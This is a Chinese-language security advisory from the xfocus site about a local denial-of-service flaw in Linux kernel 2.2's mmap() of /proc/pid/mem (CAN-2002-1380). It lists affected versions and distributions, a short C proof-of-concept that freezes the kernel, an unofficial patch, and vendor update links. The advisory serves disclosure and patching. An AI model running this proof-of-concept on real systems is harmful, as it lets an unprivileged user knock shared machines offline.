xfocus logo xfocus title
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
English Version
 最近严重漏洞 
Microsoft RPC接口远程任意代码可执行漏洞
Cisco IOS接口不正确处理IPV4包远程拒绝服务漏洞
Microsoft Windows CreateFile API命名管道权限提升漏洞

Linux Kernel 2.2 mmap()本地拒绝服务漏洞


发布时间:2002-12-17
更新时间:2002-12-19
严重程度:
威胁程度:本地拒绝服务
错误类型:设计错误
利用方式:客户机模式

BUGTRAQ ID:6420
CVE(CAN) ID:CAN-2002-1380

受影响系统
Linux kernel 2.2.1
Linux kernel 2.2.2
Linux kernel 2.2.3
Linux kernel 2.2.4
Linux kernel 2.2.5
Linux kernel 2.2.6
Linux kernel 2.2.7
Linux kernel 2.2.8
Linux kernel 2.2.9
Linux kernel 2.2.10
   +Caldera OpenLinux 2.3
Linux kernel 2.2.11
Linux kernel 2.2.12
Linux kernel 2.2.13
   +S.u.S.E. Linux 6.3
   +S.u.S.E. Linux 6.4
Linux kernel 2.2.14
   +RedHat Linux 6.2
   +SCO eDesktop 2.4
   +SCO eServer 2.3.1
Linux kernel 2.2.15
   +MandrakeSoft Corporate Server 1.0.1
   +MandrakeSoft Linux Mandrake 7.1
Linux kernel 2.2.16
   +RedHat Linux 7.0
   +Trustix Secure Linux 1.1
Linux kernel 2.2.17
   +MandrakeSoft Linux Mandrake 7.2
   +S.u.S.E. Linux 7.0
   +Trustix Secure Linux 1.2
Linux kernel 2.2.18
   +Wirex Immunix OS 6.2
   +Wirex Immunix OS 7.0
   +Wirex Immunix OS 7.0 -Beta
Linux kernel 2.2.19
   +EnGarde Secure Linux 1.0.1
   +MandrakeSoft Linux Mandrake 8.0
   +MandrakeSoft Linux Mandrake 8.0 ppc
   +MandrakeSoft Linux Mandrake 8.1
   +MandrakeSoft Single Network Firewall 7.2
   +S.u.S.E. Linux 6.3
   +S.u.S.E. Linux 6.4
   +S.u.S.E. Linux 7.0
   +Trustix Secure Linux 1.5
Linux kernel 2.2.20
Linux kernel 2.2.21
Linux kernel 2.2.22
   +Trustix Secure Linux 1.1
   +Trustix Secure Linux 1.2
   +Trustix Secure Linux 1.5
Linux kernel 2.2.23
详细描述
Linux 2.2内核存在一个拒绝服务漏洞,非特权的普通用户可能可以通过mmap()实现上的一个漏洞使内核停止响应。

2.4内核已经不受影响,因为支持mmap()的/proc/pid/mem实现已经被删除了。

测试代码
Michal Zalewski <mzalewsk@razor.bindview.com>提供如下的测试代码:

#define PAGES 10

#include <asm/page.h>
#include <sys/mman.h>
#include <unistd.h>
#include <stdio.h>
#include <fcntl.h>
#include <sys/ptrace.h>

int main() {
  int ad1,ad2,zer,mem,pid,i;
  zer=open("/dev/zero",O_RDONLY);
  ad1=(int)mmap(0,PAGES*PAGE_SIZE,0,MAP_PRIVATE,zer,0);
  pid=getpid();
  if (!fork()) {
    char p[64];
    ptrace(PTRACE_ATTACH,pid,0,0);
    sleep(1);
    sprintf(p,"/proc/%d/mem",pid);
    mem=open(p,O_RDONLY);
    ad2=(int)mmap(0,PAGES*PAGE_SIZE,PROT_READ,MAP_PRIVATE,mem,ad1);
    write(1,(char*)ad2,PAGES*PAGE_SIZE);
  }
  sleep(100);
  return 0;
}

解决方案
非官方的临时补丁:

--- linux-2.2/fs/proc/mem.c.old Sun Mar 25 08:30:58 2001
+++ linux-2.2/fs/proc/mem.c Tue Dec 10 14:29:05 2002
@@ -323,7 +323,7 @@
NULL, /* mem_readdir */
NULL, /* mem_poll */
NULL, /* mem_ioctl */
- mem_mmap, /* mmap */
+ NULL, /* mmap */
NULL, /* no special open code */
NULL, /* flush */
NULL, /* no special release code */

Trustix Secure Linux提供如下的更新:

Trustix Secure Linux RPM kernel-utils-2.2.22-8tr.i586.rpm
ftp://ftp.trustix.net/pub/Trustix/updates/1.5/RPMS/kernel-utils-2.2.22-8tr.i586.rpm

Trustix Secure Linux RPM kernel-source-2.2.22-8tr.i586.rpm
ftp://ftp.trustix.net/pub/Trustix/updates/1.5/RPMS/kernel-source-2.2.22-8tr.i586.rpm

Trustix Secure Linux RPM kernel-smp-2.2.22-8tr.i586.rpm
ftp://ftp.trustix.net/pub/Trustix/updates/1.5/RPMS/kernel-smp-2.2.22-8tr.i586.rpm

Trustix Secure Linux RPM kernel-headers-2.2.22-8tr.i586.rpm
ftp://ftp.trustix.net/pub/Trustix/updates/1.5/RPMS/kernel-headers-2.2.22-8tr.i586.rpm

Trustix Secure Linux RPM kernel-doc-2.2.22-8tr.i586.rpm
ftp://ftp.trustix.net/pub/Trustix/updates/1.5/RPMS/kernel-doc-2.2.22-8tr.i586.rpm

Trustix Secure Linux RPM kernel-BOOT-2.2.22-8tr.i586.rpm
ftp://ftp.trustix.net/pub/Trustix/updates/1.5/RPMS/kernel-BOOT-2.2.22-8tr.i586.rpm

Trustix Secure Linux RPM kernel-2.2.22-8tr.i586.rpm
ftp://ftp.trustix.net/pub/Trustix/updates/1.5/RPMS/kernel-2.2.22-8tr.i586.rpm

Trustix Secure Linux RPM kernel-utils-2.2.22-8tr.i586.rpm
ftp://ftp.trustix.net/pub/Trustix/updates/1.2/RPMS/kernel-utils-2.2.22-8tr.i586.rpm

Trustix Secure Linux RPM kernel-source-2.2.22-8tr.i586.rpm
ftp://ftp.trustix.net/pub/Trustix/updates/1.2/RPMS/kernel-source-2.2.22-8tr.i586.rpm

Trustix Secure Linux RPM kernel-smp-2.2.22-8tr.i586.rpm
ftp://ftp.trustix.net/pub/Trustix/updates/1.2/RPMS/kernel-smp-2.2.22-8tr.i586.rpm

Trustix Secure Linux RPM kernel-headers-2.2.22-8tr.i586.rpm
ftp://ftp.trustix.net/pub/Trustix/updates/1.2/RPMS/kernel-headers-2.2.22-8tr.i586.rpm

Trustix Secure Linux RPM kernel-doc-2.2.22-8tr.i586.rpm
ftp://ftp.trustix.net/pub/Trustix/updates/1.2/RPMS/kernel-doc-2.2.22-8tr.i586.rpm

Trustix Secure Linux RPM kernel-BOOT-2.2.22-8tr.i586.rpm
ftp://ftp.trustix.net/pub/Trustix/updates/1.2/RPMS/kernel-BOOT-2.2.22-8tr.i586.rpm

Trustix Secure Linux RPM kernel-2.2.22-8tr.i586.rpm
ftp://ftp.trustix.net/pub/Trustix/updates/1.2/RPMS/kernel-2.2.22-8tr.i586.rpm

Trustix Secure Linux RPM kernel-utils-2.2.22-8tr.i586.rpm
ftp://ftp.trustix.net/pub/Trustix/updates/1.1/RPMS/kernel-utils-2.2.22-8tr.i586.rpm

Trustix Secure Linux RPM kernel-source-2.2.22-8tr.i586.rpm
ftp://ftp.trustix.net/pub/Trustix/updates/1.1/RPMS/kernel-source-2.2.22-8tr.i586.rpm

Trustix Secure Linux RPM kernel-smp-2.2.22-8tr.i586.rpm
ftp://ftp.trustix.net/pub/Trustix/updates/1.1/RPMS/kernel-smp-2.2.22-8tr.i586.rpm

Trustix Secure Linux RPM kernel-headers-2.2.22-8tr.i586.rpm
ftp://ftp.trustix.net/pub/Trustix/updates/1.1/RPMS/kernel-headers-2.2.22-8tr.i586.rpm

Trustix Secure Linux RPM kernel-doc-2.2.22-8tr.i586.rpm
ftp://ftp.trustix.net/pub/Trustix/updates/1.1/RPMS/kernel-doc-2.2.22-8tr.i586.rpm

Trustix Secure Linux RPM kernel-BOOT-2.2.22-8tr.i586.rpm
ftp://ftp.trustix.net/pub/Trustix/updates/1.1/RPMS/kernel-BOOT-2.2.22-8tr.i586.rpm

Trustix Secure Linux RPM kernel-2.2.22-8tr.i586.rpm
ftp://ftp.trustix.net/pub/Trustix/updates/1.1/RPMS/kernel-2.2.22-8tr.i586.rpm

相关信息
发现者:Michal Zalewski <mzalewsk@razor.bindview.com>

相关资料:http://online.securityfocus.com/advisories/4797
          http://online.securityfocus.com/advisories/4807
Copyright © 1998-2003 XFOCUS Team. All Rights Reserved